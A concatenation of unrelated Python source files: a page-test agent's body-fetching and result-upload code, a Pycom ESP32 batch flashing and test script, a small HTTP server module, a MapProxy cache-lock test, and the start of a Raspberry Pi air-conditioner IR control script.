not header_name.startswith(':'):
headers[header_name] = value
elif isinstance(task['headers'], dict):
for header_name in task['headers']:
value = task['headers'][header_name]
if header_name.lower() not in ["accept-encoding"] and \
not header_name.startswith(':'):
headers[header_name] = value
logging.debug('Downloading %s to %s', url, dest)
response = session.get(url, headers=headers, stream=True,
timeout=30, proxies=proxies)
if response.status_code == 200:
with open(dest, 'wb') as f_out:
for chunk in response.iter_content(chunk_size=4096):
f_out.write(chunk)
self.fetch_result_queue.put(task)
except Exception:
pass
self.fetch_queue.task_done()
except Exception:
pass
def get_bodies(self, task):
"""Fetch any bodies that are missing if response bodies were requested"""
all_bodies = False
html_body = False
if 'bodies' in self.job and self.job['bodies']:
all_bodies = True
if 'htmlbody' in self.job and self.job['htmlbody']:
html_body = True
if not all_bodies and not html_body:
return
try:
path_base = os.path.join(task['dir'], task['prefix'])
path = os.path.join(task['dir'], 'bodies')
requests = []
devtools_file = os.path.join(task['dir'], task['prefix'] + '_devtools_requests.json.gz')
with gzip.open(devtools_file, 'rb') as f_in:
requests = json.load(f_in)
count = 0
bodies_zip = path_base + '_bodies.zip'
if requests and 'requests' in requests:
# See what bodies are already in the zip file
body_index = 0
bodies = []
try:
with zipfile.ZipFile(bodies_zip, 'r') as zip_file:
files = zip_file.namelist()
for filename in files:
matches = re.match(r'^(\d\d\d)-(.*)-body.txt$', filename)
if matches:
index = int(matches.group(1))
request_id = str(matches.group(2))
if index > body_index:
body_index = index
bodies.append(request_id)
except Exception:
pass
for request in requests['requests']:
if 'full_url' in request and \
'responseCode' in request \
and request['responseCode'] == 200 and \
request['full_url'].find('ocsp') == -1 and\
request['full_url'].find('.woff') == -1 and\
request['full_url'].find('.ttf') == -1 and\
'contentType' in request:
content_type = request['contentType'].lower()
need_body = False
if all_bodies:
if content_type.startswith('text/html') or \
content_type.find('javascript') >= 0 or \
content_type.find('json') >= 0:
need_body = True
elif html_body and content_type.startswith('text/html'):
need_body = True
html_body = False
if need_body:
body_id = str(request['id'])
if 'raw_id' in request:
body_id = str(request['raw_id'])
if body_id not in bodies:
count += 1
body_file_path = os.path.join(path, str(body_id))
headers = None
if 'headers' in request and 'request' in request['headers']:
headers = request['headers']['request']
task = {'url': request['full_url'],
'file': body_file_path,
'id': body_id,
'headers': headers}
if os.path.isfile(body_file_path):
self.fetch_result_queue.put(task)
else:
self.fetch_queue.put(task)
if count:
if not os.path.isdir(path):
os.makedirs(path)
logging.debug("Fetching bodies for %d requests", count)
threads = []
thread_count = min(count, 10)
for _ in xrange(thread_count):
thread = threading.Thread(target=self.body_fetch_thread)
thread.daemon = True
thread.start()
threads.append(thread)
for thread in threads:
thread.join(timeout=120)
# Build a list of files to add to the zip archive
bodies = []
try:
while True:
task = self.fetch_result_queue.get_nowait()
if os.path.isfile(task['file']):
# check to see if it is text or utf-8 data
try:
data = ''
with open(task['file'], 'rb') as f_in:
data = f_in.read()
json.loads('"' + data.replace('"', '\\"') + '"')
body_index += 1
file_name = '{0:03d}-{1}-body.txt'.format(body_index, task['id'])
bodies.append({'name': file_name, 'file': task['file']})
except Exception:
pass
self.fetch_result_queue.task_done()
except Exception:
pass
# Add the files
if bodies:
with zipfile.ZipFile(bodies_zip, 'a', zipfile.ZIP_DEFLATED) as zip_file:
for body in bodies:
zip_file.write(body['file'], body['name'])
except Exception:
pass
def upload_task_result(self, task):
"""Upload the result of an individual test run"""
logging.info('Uploading result')
cpu_pct = None
self.update_browser_viewport(task)
# Stop logging to the file
if self.log_handler is not None:
try:
self.log_handler.close()
logging.getLogger().removeHandler(self.log_handler)
self.log_handler = None
except Exception:
pass
if 'debug_log' in task and os.path.isfile(task['debug_log']):
debug_out = task['debug_log'] + '.gz'
with open(task['debug_log'], 'rb') as f_in:
with gzip.open(debug_out, 'wb', 7) as f_out:
shutil.copyfileobj(f_in, f_out)
try:
os.remove(task['debug_log'])
except Exception:
pass
if self.job['warmup'] > 0:
logging.debug('Discarding warmup run')
else:
if 'page_data' in task and 'fullyLoadedCPUpct' in task['page_data']:
cpu_pct = task['page_data']['fullyLoadedCPUpct']
data = {'id': task['id'],
'location': self.location,
'run': str(task['run']),
'cached': str(task['cached']),
'pc': self.pc_name}
if self.key is not None:
data['key'] = self.key
if self.instance_id is not None:
data['ec2'] = self.instance_id
if self.zone is not None:
data['ec2zone'] = self.zone
needs_zip = []
zip_path = None
if os.path.isdir(task['dir']):
# upload any video images
if bool(self.job['video']) and len(task['video_directories']):
for video_subdirectory in task['video_directories']:
video_dir = os.path.join(task['dir'], video_subdirectory)
if os.path.isdir(video_dir):
for filename in os.listdir(video_dir):
filepath = os.path.join(video_dir, filename)
if os.path.isfile(filepath):
name = video_subdirectory + '/' + filename
if os.path.getsize(filepath) > 100000:
logging.debug('Uploading %s (%d bytes)', filename,
os.path.getsize(filepath))
if self.post_data(self.url + "resultimage.php", data,
filepath, task['prefix'] + '_' + filename):
os.remove(filepath)
else:
needs_zip.append({'path': filepath, 'name': name})
else:
needs_zip.append({'path': filepath, 'name': name})
# Upload the separate large files (> 100KB)
for filename in os.listdir(task['dir']):
filepath = os.path.join(task['dir'], filename)
if os.path.isfile(filepath):
# Delete any video files that may have squeaked by
if not self.job['keepvideo'] and filename[-4:] == '.mp4' and \
filename.find('rendered_video') == -1:
try:
os.remove(filepath)
except Exception:
pass
elif os.path.getsize(filepath) > 100000:
logging.debug('Uploading %s (%d bytes)', filename,
os.path.getsize(filepath))
if self.post_data(self.url + "resultimage.php", data, filepath, filename):
try:
os.remove(filepath)
except Exception:
pass
else:
needs_zip.append({'path': filepath, 'name': filename})
else:
needs_zip.append({'path': filepath, 'name': filename})
# Zip the remaining files
if len(needs_zip):
zip_path = os.path.join(task['dir'], "result.zip")
with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_STORED) as zip_file:
for zipitem in needs_zip:
logging.debug('Storing %s (%d bytes)', zipitem['name'],
os.path.getsize(zipitem['path']))
zip_file.write(zipitem['path'], zipitem['name'])
try:
os.remove(zipitem['path'])
except Exception:
pass
# Post the workdone event for the task (with the zip attached)
if task['done']:
data['done'] = '1'
if task['error'] is not None:
data['error'] = task['error']
if cpu_pct is not None:
data['cpu'] = '{0:0.2f}'.format(cpu_pct)
logging.debug('Uploading result zip')
self.post_data(self.url + "workdone.php", data, zip_path, 'result.zip')
# Clean up so we don't leave directories lying around
if os.path.isdir(task['dir']):
try:
shutil.rmtree(task['dir'])
except Exception:
pass
if task['done'] and os.path.isdir(self.workdir):
try:
shutil.rmtree(self.workdir)
except Exception:
pass
def post_data(self, url, data, file_path, filename):
"""Send a multi-part post"""
ret = True
# pass the data fields as query params and any files as post data
url += "?"
for key in data:
if data[key] != None:
url += key + '=' + urllib.quote_plus(data[key]) + '&'
logging.debug(url)
try:
if file_path is not None and os.path.isfile(file_path):
self.session.post(url,
files={'file': (filename, open(file_path, 'rb'))},
timeout=300,)
else:
self.session.post(url)
except Exception:
logging.exception("Upload Exception")
ret = False
return ret
|
flasher.py
|
#!/usr/bin/env python
#
# Copyright (c) 2018, Pycom Limited.
#
# This software is licensed under the GNU GPL version 3 or any
# later version, with permitted additional terms. For more information
# see the Pycom Licence v1.0 document supplied with this file, or
# available at https://www.pycom.io/opensource/licensing
#
"""
Flash the ESP32 (bootloader, partitions table and factory app).
How to call esptool:
python esptool.py '--chip', 'esp32', '--port', /dev/ttyUSB0, '--baud', '921600', 'write_flash', '-z', '--flash_mode', 'dio', '--flash_freq', '40m', '--flash_size', 'detect', '0x1000', bootloader.bin, '0x8000', partitions.bin, '0x10000', application.bin, '0x3FF000', 'config_no_wifi.bin'
"""
from esptool import ESP32ROM
import os
import sys
import struct
import sqlite3
import argparse
import subprocess
import threading
import time
import fw_version
import csv
working_threads = {}
macs_db = None
wmacs = {}
DB_MAC_UNUSED = 0
DB_MAC_ERROR = -1
DB_MAC_LOCK = -2
DB_MAC_OK = 1
def open_macs_db(db_filename):
global macs_db
if not os.path.exists(db_filename):
print("MAC addresses database not found")
sys.exit(1)
macs_db = sqlite3.connect(db_filename)
def fetch_MACs(number):
return [x[0].encode('ascii', 'ignore') for x in macs_db.execute("select mac from macs where status = 0 order by rowid asc limit ?", (number,)).fetchall()]
def set_mac_status(mac, wmac, status):
macs_db.execute("update macs set status = ?, last_touch = strftime('%s','now'), wmac = ? where mac = ?", (status, wmac, mac))
macs_db.commit()
def print_exception(e):
print ('Exception: {}, on line {}'.format(e, sys.exc_info()[-1].tb_lineno))
def erase_flash(port, command):
global working_threads
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
num_erases = 0
# poll the process for new output until finished
while True:
nextline = process.stdout.readline()
if nextline == '' and process.poll() != None:
break
if 'Chip erase completed successfully' in nextline:
sys.stdout.write('Board erased OK on port %s\n' % port)
num_erases += 1
sys.stdout.flush()
# hack to give feedback to the main thread
if process.returncode != 0 or num_erases != 1:
working_threads[port] = None
def read_wlan_mac(port, command):
global working_threads
global wmacs
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
mac_read = False
# poll the process for new output until finished
while True:
nextline = process.stdout.readline()
if nextline == '' and process.poll() != None:
break
if 'MAC: ' in nextline:
wmacs[port] = nextline[5:-1].replace(":", "-").upper()
sys.stdout.write('MAC address %s read OK on port %s\n' % (nextline[5:-1], port))
mac_read = True
sys.stdout.flush()
# hack to give feedback to the main thread
if process.returncode != 0 or not mac_read:
working_threads[port] = None
def set_vdd_sdio_voltage(port, command):
global working_threads
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
# poll the process for new output until finished
while True:
nextline = process.stdout.readline()
if nextline == '' and process.poll() != None:
break
if 'VDD_SDIO setting complete' in nextline:
sys.stdout.write('Board VDD_SDIO Voltage configured OK on port %s\n' % port)
sys.stdout.flush()
# hack to give feedback to the main thread
if process.returncode != 0:
working_threads[port] = None
def flash_firmware(port, command):
global working_threads
process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
num_hashes = 0
# poll the process for new output until finished
while True:
nextline = process.stdout.readline()
if nextline == '' and process.poll() != None:
break
if 'at 0x00001000' in nextline:
sys.stdout.write('Bootloader programmed OK on port %s\n' % port)
elif 'at 0x00008000' in nextline:
sys.stdout.write('Partition table programmed OK on port %s\n' % port)
elif 'at 0x00010000' in nextline:
sys.stdout.write('Application programmed OK on port %s\n' % port)
elif 'Hash of data verified' in nextline:
num_hashes += 1
sys.stdout.flush()
# hack to give feedback to the main thread
if process.returncode != 0 or num_hashes != 3:
working_threads[port] = None
def run_initial_test(port, board):
global working_threads
if board == 'LoPy':
import run_initial_lopy_test as run_test
elif board == 'LoPy4':
import run_initial_lopy4_test as run_test
elif board == 'SiPy':
import run_initial_sipy_test as run_test
else:
import run_initial_wipy_test as run_test
try:
if not run_test.test_board(port):
# same trick to give feedback to the main thread
working_threads[port] = None
except Exception:
working_threads[port] = None
def flash_lpwan_mac(port, mac):
import flash_lpwan_mac
global working_threads
try:
if not flash_lpwan_mac.program_board(port, mac):
# same trick to give feedback to the main thread
working_threads[port] = None
except Exception:
working_threads[port] = None
def run_final_test(port, board, mac):
if board == 'LoPy':
import run_final_lopy_test as run_test
elif board == 'LoPy4':
import run_final_lopy4_test as run_test
else:
import run_final_sipy_test as run_test
try:
if not run_test.test_board(port, mac, fw_version.number):
# same trick to give feedback to the main thread
working_threads[port] = None
except Exception:
working_threads[port] = None
def run_qa_test(port, board):
global working_threads
if board == 'LoPy':
import run_qa_lopy_test as run_test
elif board == 'LoPy4':
import run_qa_lopy4_test as run_test
elif board == 'SiPy':
import run_qa_sipy_test as run_test
else:
import run_qa_wipy_test as run_test
try:
if not run_test.test_board(port, fw_version.number):
# same trick to give feedback to the main thread
working_threads[port] = None
except Exception:
working_threads[port] = None
def main():
cmd_parser = argparse.ArgumentParser(description='Flash the ESP32 and optionally run a small test on it.')
cmd_parser.add_argument('--esptool', default=None, help='the path to the esptool')
cmd_parser.add_argument('--espefuse', default=None, help='the path to the espefuse')
cmd_parser.add_argument('--boot', default=None, help='the path to the bootloader binary')
cmd_parser.add_argument('--table', default=None, help='the path to the partitions table')
cmd_parser.add_argument('--app', default=None, help='the path to the application binary')
cmd_parser.add_argument('--macs', default="macs.db", help='the path to the MAC addresses database')
cmd_parser.add_argument('--ports', default=['/dev/ttyUSB0'], nargs='+', help="the serial ports of the ESP32's to program")
cmd_parser.add_argument('--erase', default=None, help='set to True to erase the boards first')
cmd_parser.add_argument('--qa', action='store_true', help='just do some quality asurance test')
cmd_parser.add_argument('--board', default='LoPy', help='identifies the board to be flashed and tested')
cmd_parser.add_argument('--revision', default='1', help='identifies the hardware revision')
cmd_args = cmd_parser.parse_args()
global working_threads
global wmacs
output = ""
ret = 0
global_ret = 0
if cmd_args.qa:
raw_input("Please reset all the boards, wait until the LED starts blinking and then press enter...")
time.sleep(2.5) # wait for the board to reset
try:
for port in cmd_args.ports:
working_threads[port] = threading.Thread(target=run_qa_test, args=(port, cmd_args.board))
working_threads[port].start()
for port in cmd_args.ports:
if working_threads[port]:
working_threads[port].join()
for port in cmd_args.ports:
if working_threads[port] == None:
print("Failed QA test on board connected to %s" % port)
ret = 1
except Exception as e:
ret = 1
print_exception(e)
if ret == 0:
print("=============================================================")
print("QA test succeeded on all boards:-)")
print("=============================================================")
else:
print("=============================================================")
print("ERROR: Some boards failed the QA test!")
print("=============================================================")
global_ret = 1
else:
print("Reading the WLAN MAC address...")
try:
for port in cmd_args.ports:
cmd = ['python', 'esptool.py', '--port', port, 'read_mac']
working_threads[port] = threading.Thread(target=read_wlan_mac, args=(port, cmd))
working_threads[port].start()
for port in cmd_args.ports:
if working_threads[port]:
working_threads[port].join()
_ports = list(cmd_args.ports)
for port in _ports:
if working_threads[port] == None:
print("Error reading the WLAN MAC on the board on port %s" % port)
cmd_args.ports.remove(port)
ret = 1
except Exception as e:
ret = 1
print_exception(e)
if ret == 0:
print("=============================================================")
print("WLAN MAC address reading succeeded :-)")
print("=============================================================")
else:
print("=============================================================")
print("ERROR: WLAN MAC address reading failed in some boards!")
print("=============================================================")
global_ret = 1
raw_input("Please reset all the boards and press enter to continue with the flashing process...")
if int(cmd_args.revision) > 1:
# program the efuse bits to set the VDD_SDIO voltage to 1.8V
try:
print('Configuring the VDD_SDIO voltage...')
for port in cmd_args.ports:
cmd = ['python', cmd_args.espefuse, '--port', port, '--do-not-confirm', 'set_flash_voltage', '1.8V']
working_threads[port] = threading.Thread(target=set_vdd_sdio_voltage, args=(port, cmd))
working_threads[port].start()
for port in cmd_args.ports:
if working_threads[port]:
working_threads[port].join()
_ports = list(cmd_args.ports)
for port in _ports:
if working_threads[port] == None:
print("Error setting the VDD_SDIO voltage on the board on port %s" % port)
cmd_args.ports.remove(port)
ret = 1
except Exception as e:
ret = 1
print_exception(e)
if ret == 0:
print("=============================================================")
print("VDD_SDIO voltage setting succeeded :-)")
print("=============================================================")
else:
print("=============================================================")
print("ERROR: VDD_SDIO voltage setting failed in some boards!")
print("=============================================================")
global_ret = 1
raw_input("Please reset all the boards and press enter to continue with the flashing process...")
time.sleep(1.0) # wait for the board to reset
working_threads = {}
if cmd_args.erase:
try:
print('Erasing flash memory... (will take a few seconds)')
for port in cmd_args.ports:
cmd = ['python', cmd_args.esptool, '--chip', 'esp32', '--port', port, '--baud', '921600',
'erase_flash']
working_threads[port] = threading.Thread(target=erase_flash, args=(port, cmd))
working_threads[port].start()
for port in cmd_args.ports:
if working_threads[port]:
working_threads[port].join()
_ports = list(cmd_args.ports)
for port in _ports:
if working_threads[port] == None:
print("Error erasing board on port %s" % port)
cmd_args.ports.remove(port)
ret = 1
except Exception as e:
ret = 1
print_exception(e)
if ret == 0:
print("=============================================================")
print("Batch erasing succeeded :-)")
print("=============================================================")
else:
print("=============================================================")
print("ERROR: Batch erasing failed in some boards!")
print("=============================================================")
global_ret = 1
raw_input("Please reset all the boards and press enter to continue with the flashing process...")
time.sleep(1.0) # wait for the board to reset
working_threads = {}
try:
if cmd_args.board == 'LoPy' or cmd_args.board == 'SiPy' or cmd_args.board == 'LoPy4':
open_macs_db(cmd_args.macs)
macs_list = fetch_MACs(len(cmd_args.ports))
if len(macs_list) < len(cmd_args.ports):
print("No enough remaining MAC addresses to use")
sys.exit(1)
mac_per_port = {}
i = 0
for port in cmd_args.ports:
mac_per_port[port] = macs_list[i]
i += 1
for port in cmd_args.ports:
cmd = ['python', cmd_args.esptool, '--chip', 'esp32', '--port', port, '--baud', '921600',
'write_flash', '-z', '--flash_mode', 'dio', '--flash_freq', '40m', '--flash_size', 'detect', '0x1000', cmd_args.boot,
'0x8000', cmd_args.table, '0x10000', cmd_args.app]
working_threads[port] = threading.Thread(target=flash_firmware, args=(port, cmd))
working_threads[port].start()
for port in cmd_args.ports:
if working_threads[port]:
working_threads[port].join()
_ports = list(cmd_args.ports)
for port in _ports:
if working_threads[port] == None:
print("Error programming board on port %s" % port)
cmd_args.ports.remove(port)
ret = 1
else:
print("Board on port %s programmed OK" % port)
except Exception as e:
ret = 1
print_exception(e)
if ret == 0:
print("=============================================================")
print("Batch programming succeeded :-)")
print("=============================================================")
else:
print("=============================================================")
print("ERROR: Batch firmware programming failed on some boards!")
print("=============================================================")
global_ret = 1
raw_input("Please place all boards into run mode, RESET them and then \n press enter to continue with the testing process...")
time.sleep(5.0) # wait for the board to reset
working_threads = {}
try:
for port in cmd_args.ports:
working_threads[port] = threading.Thread(target=run_initial_test, args=(port, cmd_args.board))
working_threads[port].start()
for port in cmd_args.ports:
if working_threads[port]:
working_threads[port].join()
_ports = list(cmd_args.ports)
for port in _ports:
if working_threads[port] == None:
print("Error testing board on port %s" % port)
cmd_args.ports.remove(port)
ret = 1
elif cmd_args.board == 'WiPy':
print("Batch test OK on port %s, firmware version %s" % (port, fw_version.number))
with open('%s_Flasher_Results.csv' % (cmd_args.board), 'ab') as csv_file:
csv_writer = csv.writer(csv_file, delimiter=',')
csv_writer.writerow(['%s' % (cmd_args.board), '%s' % (fw_version.number), ' ', 'OK'])
except Exception as e:
ret = 1
print_exception(e)
if ret == 0:
print("=============================================================")
print("Batch testing succeeded :-)")
print("=============================================================")
else:
print("=============================================================")
print("ERROR: Batch testing failed in some boards!")
print("=============================================================")
global_ret = 1
# only do the MAC programming and MAC verificacion for the LoPy, SiPy and LoPy4
if cmd_args.board == 'LoPy' or cmd_args.board == 'SiPy' or cmd_args.board == 'LoPy4':
print("Waiting before programming the LPWAN MAC address...")
time.sleep(3.5) # wait for the board to reset
working_threads = {}
try:
for port in cmd_args.ports:
set_mac_status(mac_per_port[port], "", DB_MAC_LOCK) # mark them as locked, so if the script fails and doesn't get to save, they wont be accidentally reused
working_threads[port] = threading.Thread(target=flash_lpwan_mac, args=(port, mac_per_port[port]))
working_threads[port].start()
for port in cmd_args.ports:
if working_threads[port]:
working_threads[port].join()
_ports = list(cmd_args.ports)
for port in _ports:
if working_threads[port] == None:
print("Error programing MAC address on port %s" % port)
cmd_args.ports.remove(port)
ret = 1
set_mac_status(mac_per_port[port], wmacs[port], DB_MAC_ERROR)
except Exception as e:
ret = 1
print_exception(e)
if ret == 0:
print("=============================================================")
print("Batch MAC programming succeeded :-)")
print("=============================================================")
else:
print("=============================================================")
print("ERROR: Batch MAC programming failed in some boards!")
print("=============================================================")
global_ret = 1
print("Waiting for the board(s) to reboot...")
time.sleep(4.5) # wait for the board to reset
working_threads = {}
try:
for port in cmd_args.ports:
working_threads[port] = threading.Thread(target=run_final_test, args=(port, cmd_args.board, mac_per_port[port]))
working_threads[port].start()
for port in cmd_args.ports:
if working_threads[port]:
working_threads[port].join()
for port in cmd_args.ports:
if working_threads[port] == None:
ret = 1
set_mac_status(mac_per_port[port], wmacs[port], DB_MAC_ERROR)
print("Error performing MAC address test on port %s" % port)
else:
set_mac_status(mac_per_port[port], wmacs[port], DB_MAC_OK)
print("Final test OK on port %s, firmware version %s, MAC address %s" % (port, fw_version.number, mac_per_port[port]))
with open('%s_Flasher_Results.csv' % (cmd_args.board), 'ab') as csv_file:
csv_writer = csv.writer(csv_file, delimiter=',')
csv_writer.writerow(['%s' % (cmd_args.board), '%s' % (fw_version.number), '%s' % (mac_per_port[port]), 'OK'])
except Exception as e:
ret = 1
print_exception(e)
if ret == 0:
print("=============================================================")
print("Final test succeeded on all boards :-)")
print("=============================================================")
else:
print("=============================================================")
print("ERROR: Some boards failed the final test!")
print("=============================================================")
global_ret = 1
macs_db.close()
sys.exit(global_ret)
if __name__ == "__main__":
main()
|
pvhttpsrv.py
|
#!/usr/bin/env python3
# Infos: https://medium.com/@andrewklatzke/creating-a-python3-webserver-from-the-ground-up-4ff8933ecb96
#
# Aditional Infos:
# https://www.afternerd.com/blog/python-http-server/
# https://daanlenaerts.com/blog/2015/06/03/create-a-simple-http-server-with-python-3/
# https://stackabuse.com/serving-files-with-pythons-simplehttpserver-module/
from pv.data import PVData
from pvbasemodul import PVBaseModul
import threading
from http.server import HTTPServer
from pvhttpsrv.server import Server
class PVHttpSrv(PVBaseModul):
pvdata = PVData()
handler = None
httpd = None
enabled = False
serveraddress = ""
port = 8080
directory = ""
def __init__(self, serveraddress="", port=8080, directory="", onDataRequest=None, onWebCamRequest=None):
super().__init__()
def InitArguments(self, parser):
super().InitArguments(parser)
parser.add_argument('-hse', '--httpsrvenabled', help='http server enabled', required=False)
parser.add_argument('-hsa', '--httpsrvaddress', help='http server address', required=False)
parser.add_argument('-hsp', '--httpsrvport', help='http server port', required=False)
parser.add_argument('-hsd', '--httpsrvdirectory', help='http server directory', required=False)
def SetConfig(self, config, args):
super().SetConfig(config, args)
configsection = "httpserver"
self.enabled = self.CheckArgsOrConfig(config, self.enabled, args.httpsrvenabled, configsection, "enabled", "bool")
self.serveraddress = self.CheckArgsOrConfig(config, self.serveraddress, args.httpsrvaddress, configsection, "srvaddress")
self.port = self.CheckArgsOrConfig(config, self.port, args.httpsrvport, configsection, "port", "int")
self.directory = self.CheckArgsOrConfig(config, self.directory, args.httpsrvdirectory, configsection, "directory")
def Connect(self, onDataRequest=None, onWebCamRequest=None):
print("PVHttpSrv.Connect() called")
super().Connect()
self.onDataRequest = onDataRequest
self.onWebCamRequest = onWebCamRequest
self.handler = Server # pvHttpRequestHandler
self.handler.onDataRequest = onDataRequest
self.handler.onWebCamRequest = onWebCamRequest
self.handler.directory = self.directory
# Server settings
# Choose port 8080, for port 80, which is normally used for a http server, you need root access
server_address = (self.serveraddress, self.port)
self.httpd = HTTPServer(server_address, self.handler)
self.server_thread = threading.Thread(target=self.httpd.serve_forever)
self.server_thread.daemon = True
def run(self):
print('starting http server...')
self.server_thread.start()
print('running http server...')
def stop(self):
self.httpd.shutdown()
self.httpd.server_close()
print("http server stopped")
|
test_seed_cachelock.py
|
# This file is part of the MapProxy project.
# Copyright (C) 2012 Omniscale <http://omniscale.de>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import multiprocessing
import time
import sys
import pytest
from mapproxy.seed.cachelock import CacheLocker, CacheLockedError
@pytest.mark.skipif(sys.platform == "win32", reason="test not supported for Windows")
@pytest.mark.skipif(sys.platform == "darwin" and sys.version_info >= (3, 8), reason="test not supported for MacOS with Python >=3.8")
class TestCacheLock(object):
@pytest.fixture
def lock_file(self, tmpdir):
return (tmpdir / "lock").strpath
def test_free_lock(self, lock_file):
locker = CacheLocker(lock_file)
with locker.lock("foo"):
assert True
def test_locked_by_process_no_block(self, lock_file):
proc_is_locked = multiprocessing.Event()
def lock():
locker = CacheLocker(lock_file)
with locker.lock("foo"):
proc_is_locked.set()
time.sleep(10)
p = multiprocessing.Process(target=lock)
p.start()
# wait for process to start
proc_is_locked.wait()
locker = CacheLocker(lock_file)
# test unlocked bar
with locker.lock("bar", no_block=True):
assert True
# test locked foo
try:
with locker.lock("foo", no_block=True):
assert False
except CacheLockedError:
pass
finally:
p.terminate()
p.join()
def test_locked_by_process_waiting(self, lock_file):
proc_is_locked = multiprocessing.Event()
def lock():
locker = CacheLocker(lock_file)
with locker.lock("foo"):
proc_is_locked.set()
time.sleep(.1)
p = multiprocessing.Process(target=lock)
start_time = time.time()
p.start()
# wait for process to start
proc_is_locked.wait()
locker = CacheLocker(lock_file, polltime=0.02)
try:
with locker.lock("foo", no_block=False):
diff = time.time() - start_time
assert diff > 0.1
finally:
p.terminate()
p.join()
|
control.py
|
# -*- coding: utf-8 -*-
# !/usr/bin/python
import sqlite3
import time
import serial
import binascii
import RPi.GPIO as GPIO
from sakshat import SAKSHAT
import threading
import os
GPIO.setmode(GPIO.BCM)
DS = 6
SHCP = 19
STCP = 13
PIN_NO_BEEP = 12
# 开机
ac_open = ['FD','FD','30','03','40','17','00','34','1F','01','2F','02','6A','00','25','00','21','00','27','00','16','05','27','00','2F','0A','27','00','00','00','23','00','FF','FF','FF','FF','FF','FF','FF','FF','01','22','12','22','22','12','12','22','22','22','22','12','22','22','21','21','22','12','32','22','21','22','22','22','22','12','22','22','22','22','22','22','22','22','24','01','22','12','22','22','12','12','22','22','22','22','12','22','22','21','11','22','12','32','22','22','22','22','22','22','22','22','22','22','22','22','22','21','21','15','00','00','F0','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','01','76','3F','A1','DF','DF']
# 关机
ac_close = ['FD','FD','30','03','40','17','00','34','23','01','29','02','68','00','28','00','21','00','27','00','15','05','27','00','2D','0A','28','00','00','00','24','00','FF','FF','FF','FF','FF','FF','FF','FF','01','22','22','22','22','12','12','22','22','22','22','12','22','22','21','21','22','12','32','22','21','22','22','22','22','12','22','22','22','22','22','22','22','22','14','01','22','22','22','22','12','12','22','22','22','22','12','22','22','21','11','22','12','32','22','22','22','22','22','22','22','22','22','22','22','22','22','21','21','25','00','00','F0','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','76','00','7F','DF','DF']
# 温度减:
ac_down = ['FD','FD','30','03','40','17','00','34','24','01','2B','02','23','00','25','00','6A','00','25','00','17','05','26','00','32','0A','27','00','00','00','23','00','FF','FF','FF','FF','FF','FF','FF','FF','01','12','21','11','11','21','11','11','11','11','11','21','11','11','12','12','11','21','31','11','12','11','11','11','11','21','11','11','11','11','11','11','12','21','24','01','12','21','11','11','21','11','11','11','11','11','21','11','11','12','22','11','21','31','11','11','11','11','11','11','11','11','11','11','11','11','11','11','11','25','00','00','F0','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','08','76','01','BB','DF','DF']
# 温度加:
ac_up = ['FD','FD','30','03','40','17','00','34','23','01','2B','02','23','00','26','00','6A','00','25','00','17','05','25','00','33','0A','27','00','00','00','23','00','FF','FF','FF','FF','FF','FF','FF','FF','01','12','21','11','11','12','11','11','11','11','11','21','11','11','12','12','11','21','31','11','12','11','11','11','11','21','11','11','11','11','11','11','12','12','24','01','12','21','11','11','12','11','11','11','11','11','21','11','11','12','22','11','21','31','11','11','11','11','11','11','11','11','11','11','11','11','11','11','21','25','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','00','EA','DF','DF']
# 制冷:
